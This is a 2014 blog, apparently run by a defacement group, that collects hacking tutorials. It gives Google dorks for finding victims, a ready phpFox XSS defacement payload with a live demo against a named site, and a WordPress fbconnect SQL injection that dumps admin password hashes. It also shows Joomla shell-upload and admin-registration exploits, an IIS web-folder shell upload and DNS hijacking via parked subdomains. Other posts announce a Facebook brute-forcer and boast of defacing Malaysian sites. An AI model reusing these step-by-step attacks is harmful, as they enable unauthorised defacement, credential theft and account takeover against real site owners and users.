Monday, 10 March 2014

DNS Hijacking with 000Webhost







Finding Target

1- Singup for an account at www.000webhost.com

2- Create a new site, just use the subdomain,for example mine was : http://testingfu.comule.com 






Exploiting Target

1- Now Go to CPanel and Look for IP Adress, you'll get something like "31.170.163.140"

2- Now Goto Bing .com and type dork ip:31.170.163.140.If you want .gov .edu or any other particular domain then dork should be " ip:31.170.163.140 .gov " or " ip:31.170.163.140 .edu "

Server 1 with 253 ips
31.170.161.1 - 31.170.161.253

Server 2 with with 253 ips
31.170.162.1 - 31.170.162.253

Server 3 with 242 ips
31.170.163.1 - 31.170.163.241


3- Let say our result/target is york.gov.il , simply add abcd or anything you like in front of the URL, so it would be like this

abcd.york.gov.il

and you will get this error page





4- Now go to your Cpanel at 000webhost and park a subdomain 





 5- Now go to public_html and upload your deface page. :D


SOURCE: DEVILCAFE

phpFox XSS Vulnerability








Finding Vulnerable Target

Dork: "intext:© · English (US) Powered By phpFox Version 3.0.1."
            "inurl:/static/ajax.php?core"


1- Choose any dork and paste on Google

2- Choose any site


Exploiting Target

1- So, your site would be like this or something similar,

www.site.com/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=<div class="error_message">Error Message Here&core[security_token]=99d754d2b583565369e194e30eaabcbc  


2- Now, change the error message with your HTML tags or anything you want.

To show Header
<h1>Hacked</h1>

To show header in center

<center><h1>Hacked</h1></center>

To show Title

<title>Hacked</title>

To Add a Image
<img src="http://www.black-cybersec-crew.blogspot.com'><img src="http://i1345.photobucket.com/albums/p673/Apiz_pudin/bb_zps5fa4dc8b.png"/>

To add a Message
<p><b>Your Message Here<b></p>

To write message in next lines
<p><b>First line<br>Second Line <b></p>

To add a scrolling Text
<marquee>Scrolling text Here</marquee>

To Add a alert box

<script>alert("hello");</script>

To add background colour in page

<body bgcolor="red"/>

To Add a full deface Page
<title>Hacked!</title><body bgcolor=black><center><font color="white"><h2>XSSed!</h2><br><h1>./BL4CK E4GL3 W4S H3RE</h1><a href='http://www.black-cybersec-crew.blogspot.com'><marquee><img src="http://i1345.photobucket.com/albums/p673/Apiz_pudin/bb_zps5fa4dc8b.png"/></marquee>


3- So it would be like this,

http://www.site.com/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ctitle%3EHacked!%3C/title%3E%3Cbody%20bgcolor=black%3E%3Ccenter%3E%3Cfont%20color=%22white%22%3E%3Ch2%3EXSSed!%3C/h2%3E%3Cbr%3E%3Ch1%3E./BL4CK%20E4GL3%20W4S%20H3RE%3C/h1%3E%3Ca%20href=%27http://www.black-cybersec-crew.blogspot.com%27%3E%3Cmarquee%3E%3Cimg%20src=%22http://i1345.photobucket.com/albums/p673/Apiz_pudin/bb_zps5fa4dc8b.png%22/%3E%3C/marquee%3E


Live Demo:

http://artisticdimeinc.com/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ctitle%3EHacked!%3C/title%3E%3Cbody%20bgcolor=black%3E%3Ccenter%3E%3Cfont%20color=%22white%22%3E%3Ch2%3EXSSed!%3C/h2%3E%3Cbr%3E%3Ch1%3E./BL4CK%20E4GL3%20W4S%20H3RE%3C/h1%3E%3Ca%20href=%27http://www.black-cybersec-crew.blogspot.com%27%3E%3Cmarquee%3E%3Cimg%20src=%22http://i1345.photobucket.com/albums/p673/Apiz_pudin/bb_zps5fa4dc8b.png%22/%3E%3C/marquee%3E

IIS Exploit







Finding Vulnerable Target

Dork:  inurl:"~r00t.txt"
             intext:"Powered by IIS"

MORE DORKS

1- Choose any dork and paste on Google

2- Choose any site


Exploiting Target

1- Go to Start>Run


2- Copy and paste this code in the text box

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}




3- Click OK

4-Now a window will open. Choose File > New > Web Folder




5-Type the website’s address you want to deface in the text box and Click Next then Finish

  
6- Now Go to the Web Folder you created In My Computer > My Network Places. Open the Folder Paste your Shell.asp or deface page.

7- Now, to access your shell or to see your Deface Page, just open your browser and type the site name and
your shell name of deface page name like this-

Shell

http://www.site.com/shell.asp;.jpg
 
Deface Page 

 http://www.site.com/deface-page.html  


 

Exploit Wordpress : fbconnect SQL Injection Vulnerability







Hey guys, today i'm going to share with you about an exploit in Wordpress that enable you to get the admin's Username and Password(encrypted)

Finding Vulnerable Target

Dork: inurl:"fbconnect_action=myhome" 

Exploit: 

?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,
7,8,9,10,11,12+from+wp_users--

1- Copy the dork and paste it on Google

2- Choose any site and you will see something like this or similar,





Exploiting Target

1- Let say your target URL is like this,

http://www/site.com/?fbconnect_action=myhome&userid=3

Paste the exploit behind the URL, so it will be like this

http://www.site.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)
z0mbyak,7,8,9,10,11,12+from+wp_users--

2- So there you go, you have the Username and the Password. But, don't forget to decrypt it first ;)




user:password

So in this case, the user is MarkMullins and the password is $P$BN0PffKCxFw7aBpWfeUz/kSumdPaeR.

3- After you have successfully decrypt the password, you can login into the website at

www.site.com/wp-login.php

or

www.site.com/wp-admin  

Saturday, 8 March 2014

Malaysian Site Hacked During Ops #Gila #Hempas As A Warning To The Govermernt of Malaysia




Once again, Malaysian Websites was attacked by hackers from their own country. If examined in detail, this time the attacks similar to the attack made by "Sofea Hana" during the last elections.

In the past, "Sofea Hana" listed several demands on the defense of the rights of the people, this time, Ops #Gila #Hempas also feature some of the claims. Defacement of them listed on the hacked website: -


  1. Oppose PBS implementation burden teachers and students. They are not experiments whatever reason given
  2. Abolish GST burden subtly .
  3. Against Trans- Pacific Partnership agreement Agreement ( TPPA )
  4. Kelantan willingly want to impose hudud. Let them implement hudud in advance while other states observe their development .   
  5. People increasingly pinched as the cost of living rising . Please execute Free Education 
  6. Multiply the number of affordable homes for the people.
  7. Please MACC perform tasks more transparent and unbiased .
  8. MACC urges probe leakages of public funds .
  9. Eliminate leeches Road ( Suit AES) .
  10. Please preserve the dignity of religious leaders is not just in the mouth alone, but through action .
  11. Please execute the administration of religious mold in total, not per the British .
  12. What's great about Taib Mahmud up her immune from MACC ? Please MACC bold and transparent in matters such as this !
  13. Lower the price of the vehicle . We can not afford to wait until PRU14 .
  14. Do not hide things about people , such as the rise in Senyap2 RON97 without the knowledge of the people .
  15. Why is there a high profile case closed while there are still no solution ? Please transparency in the investigation, we the people do not forget . 

  List of the hacked websited that have been submitted in Zone-H

    http://www.kelab-umno.com/
    http://zone-h.org/mirror/id/21961302
    http://umnojb.com.my/
    http://zone-h.org/mirror/id/21961428
    http://analytics.valse.com.my/
    https://campaign.valse.com.my/system/admin/
    http://mcdns.valse.com.my/
    http://mvc.valse.com.my/
    http://paysuite.my/
    http://projects.valse.com.my/
    http://sim.valse.com.my/
    http://smsi.valse.com.my/
    http://stage.paysuite.my/
    http://support.valse.com.my/
    http://zone-h.org/mirror/id/21961252
    http://zone-h.org/mirror/id/21961253
    http://zone-h.org/mirror/id/21961254
    http://zone-h.org/mirror/id/21961255
    http://zone-h.org/mirror/id/21961256
    http://zone-h.org/mirror/id/21961251
    http://zone-h.org/mirror/id/21961250
    http://zone-h.org/mirror/id/21961249
    http://zone-h.org/mirror/id/21961248
    http://zone-h.org/mirror/id/21961247
    http://system.valse.com.my/
    http://valse.com.my/
    http://zone-h.org/mirror/id/21961283
    http://zone-h.org/mirror/id/21961284
    http://abadiheights.com.my/home.html
    http://abcidealpartners.com/
    http://abt.com.my/
    http://artpro.com.my/
    http://brainy.com.my/
    http://cerahkl.com/


Based on what we have been informed, Ops #Gila #Hempas this time joined by many local hacker groups including RED BEAN ARMY. 

SOURCE: TETIKUS.NET 

Twitter.com Hacked Via Text Load Injection by ./BL4CK E4GL3



I found this around 2 AM last night, and it's quite suprising that twitter.com is vulnerable for Text Load Injection . Text load injection is where you're are allowed to inject text from ixData that is an indextable data type. So it will displays message as follow,


{"request":"\/i\/promoted_content\/log.json?BL4CK_E4GL3_W4S_H3RE",
"error":"Invalid event parameter provided."}
 
We will get that message by visiting the following link:
 https://twitter.com/i/promoted_content/log.json?BL4CK_E4GL3_W4S_H3RE  
 
I tried to sumbit it on Defacement Mirror like Zone-H, but I can't 
because someone already sumbitted Twitter.com to that mirror, and it was 
a FAKE defacement. WTF?
 
 
 

Friday, 7 March 2014

Facebook Password Cracker v1 [Released!]







Hello everyone! This is the time that you guys have waiting for, the release of Facebook Password Cracker!

Features:

-Audio (supported in some OS with Mplayer)
-Coloured Text (supported in some OS/Python version)
-Anti-Proxy


This is just a brute forcer, so it won't confirm any success. It depends on your target. I advised you to make your own password list based on your target, so it would be more accurate. 

YOU MUST INSTALL PYTHON TO RUN THIS PROGRAMME

Audio

There is a voice saying "Welcome!" Once you've start it. It is supported in some OS with Mplayer. If you do not have Mplayer, you will get an error message like this,

"player: could not connect to socket
mplayer: No such file or directory
;31m" 


But don't worry, the programme will still running :D


Coloured Text

I put some colour to the text, so it won't looks boring only. This might not be supported by all OS/Python version, but the programme will still running :D


Anti-Proxy

In case if you are trying to hack Facebook account from another country, you don't need to use proxy at all. I tested with an Israeli Facebook account, and it was successfully cracked without any problem.     


Important Note

There is disadvantage of this programme is, if you are in a STRONG internet connection, you cannot use a large password list. The maximum number of password in one wordlist is only 6. This is because, if you are brute forcing in a STRONG internet connection, your attack will be blocked by Facebook firewall.

But, if you are in a WEAK internet connection, you're free to use how many password in a wordlist as you like. There will be no interruption by Facebook firewall.    






Enjoy! WE WILL NOT BE RESPONSIBLE OF ANY MISUSE OF THIS PROGRAMME.

Please tell us anything you want us to add/fix about this programme :) 

Exploit Joomla! : com_jinc






POC:

Dork: inurl:option=com_jinc

Exploit: 

/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=shell.php 

Shell Uploaded to:

 /administrator/components/com_jinc/classes/graphics/tmp-upload-images/shell.php


This exploit is exactly the same as the previous post: Exploit Joomla :com_maian15

How to Upload Shell in Joomla! Site [Video]






Exploit Joomla! : Com_user [Manual]



  Hello everyone! It has been a while that i haven't update this blog post since i was very busy. So, as for today i wanna post about exploit in CMS Joomla! which the vulnerability is we can register new user on the site.

Finding Vulnerable target:

Dorks:

inurl:index.php/using/joomla site:com
   
intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com

MORE DORKS

Exploit:

index.php?option=com_users&view=registration


1- Copy any of the dorks and paste it on Google
2- Choose any site and check administrator page by adding /administrator/ at the end of the site URL.

Example:

 www.site.com/index.php/using-joomla/extensions/components/content-component/article-category-list/50-terapia

to

www.site.com/administrator/

So you will see the admin login area. If the admin login area is like the picture below, it might be vulnerable,

  
Vulnerable

 Not Vulnerable

*Note: Ignore the language of the admin login panel.
Exploiting Target

1- Paste the exploit behind the site URL, so you will get the registration form.

2- Fill in the form, at the password column, put different password.For Example,

Password: abcdefg
Confirm Password: abcxyz123

3- In the Confirm Email Column, click inspect element and paste this code below it,

<dd><input value="7" name="jform[groups][]"/></dd>

4- Click register, and it will says "Password not match.." or something similar, simply fill the form correctly and click register.

5- The confirmation email will be send to your email address, check your inbox and click on the link given to activate your account

6- Go to administrator login area, and login with your username and password.


Can't understand? Watch this video, and leave a comment :D



Also see: How to Upload Shell In Joomla! Site [Video]